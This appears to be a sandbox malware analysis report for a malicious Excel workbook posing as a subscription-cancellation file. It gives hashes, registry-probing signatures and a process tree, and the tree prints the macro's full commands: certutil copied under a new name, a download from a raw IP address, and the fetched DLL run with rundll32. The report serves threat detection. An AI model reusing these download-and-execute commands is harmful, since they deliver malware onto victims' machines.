cancel_sub_VCP1234567890123.xlsb

General

Target:    cancel_sub_VCP1234567890123.xlsb
Filesize:  123KB
Completed: 10-06-2021 19:17
Score:     10/10
MD5:       9e1ee4a42c381eabcf2cde38a1aae7c9
SHA1:      015bb306d9e54001d433b3ac2e7212b864f54ae2
SHA256:    fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3

Malware Config

Signatures 7

Discovery

  • Process spawned unexpected child process
    Processes: cmd.exe, cmd.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 4268 | 4440 | cmd.exe | EXCEL.EXE
    Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 1864 | 4440 | cmd.exe | EXCEL.EXE

  • Executes dropped EXE
    Process: TTObk2.exe

    Reported IOCs

    pid | process
    692 | TTObk2.exe

  • Checks processor information in registry
    Process: EXCEL.EXE

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE

  • Enumerates system info in registry
    Process: EXCEL.EXE

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE

  • Suspicious behavior: AddClipboardFormatListener
    Process: EXCEL.EXE

    Reported IOCs

    pid | process
    4440 | EXCEL.EXE

  • Suspicious use of SetWindowsHookEx
    Process: EXCEL.EXE

    Reported IOCs

    pid | process
    4440 | EXCEL.EXE (14 identical events reported)

  • Suspicious use of WriteProcessMemory
    Processes: EXCEL.EXE, cmd.exe

    Reported IOCs (each event reported twice)

    description | pid | process | target process
    PID 4440 wrote to memory of 4268 | 4440 | EXCEL.EXE | cmd.exe
    PID 4440 wrote to memory of 692 | 4440 | EXCEL.EXE | TTObk2.exe
    PID 4440 wrote to memory of 1864 | 4440 | EXCEL.EXE | cmd.exe
    PID 1864 wrote to memory of 2128 | 1864 | cmd.exe | rundll32.exe
Processes 5
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\cancel_sub_VCP1234567890123.xlsb"
    Checks processor information in registry
    Enumerates system info in registry
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:4440
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir %programdata%\TTObk2 && copy /b %SystemRoot%\System32\certutil.exe %programdata%\TTObk2\TTObk2.exe
      Process spawned unexpected child process
      PID:4268
    • C:\programdata\TTObk2\TTObk2.exe
      "C:\programdata\TTObk2\TTObk2.exe" -urlcache -f -split http://195.123.235.51 c:\programdata\TTObk2\TTObk2.dll
      Executes dropped EXE
      PID:692
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rundll32 %programdata%\TTObk2\TTObk2.dll,StartW
      Process spawned unexpected child process
      Suspicious use of WriteProcessMemory
      PID:1864
      • C:\Windows\system32\rundll32.exe
        rundll32 C:\ProgramData\TTObk2\TTObk2.dll,StartW
        PID:2128
Network
MITRE ATT&CK Matrix

Tactic columns shown (no technique cells survived extraction): Collection, Command and Control, Credential Access, Defense Evasion, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Persistence, Privilege Escalation
                        Downloads
  • C:\ProgramData\TTObk2\TTObk2.dll
    MD5:    336d5ebc5436534e61d16e63ddfca327
    SHA1:   3bc15c8aae3e4124dd409035f32ea2fd6835efc9
    SHA256: 3973e022e93220f9212c18d0d0c543ae7c309e46640da93a4a0314de999f5112
    SHA512: 7c0b0d99a6e4c33cda0f6f63547f878f4dd9f486dfe5d0446ce004b1c0ff28f191ff86f5d5933d3614cceee6fbbdc17e658881d3a164dfa5d6f4c699b2126e3d

  • C:\ProgramData\TTObk2\TTObk2.exe (also listed as C:\programdata\TTObk2\TTObk2.exe; both entries carry the same hashes)
    MD5:    056c7d065f4622da9cc2848f47e2bae2
    SHA1:   6c6f18b0ec53dc63488961c4240ec584ac71c25f
    SHA256: e09a2d7ecac1a10c89e27750a18790da06ddd7311965dbc9ab6096f636dae61c
    SHA512: db158c9b669a2668149caf30df32595a488dcc831d7518ca2e793eac0885492a2eaee838914e706a585b7f3f1c801e299c697b2cec509204561bb098e16253d5

  Memory dumps
  • memory/692-181-0x0000000000000000-mapping.dmp
  • memory/1864-183-0x0000000000000000-mapping.dmp
  • memory/2128-184-0x0000000000000000-mapping.dmp
  • memory/4268-179-0x0000000000000000-mapping.dmp
  • memory/4440-123-0x00007FF9D3020000-0x00007FF9D4F15000-memory.dmp
  • memory/4440-122-0x00007FF9D4F20000-0x00007FF9D600E000-memory.dmp
  • memory/4440-121-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
  • memory/4440-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
  • memory/4440-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
  • memory/4440-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
  • memory/4440-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
  • memory/4440-114-0x00007FF66AA70000-0x00007FF66E026000-memory.dmp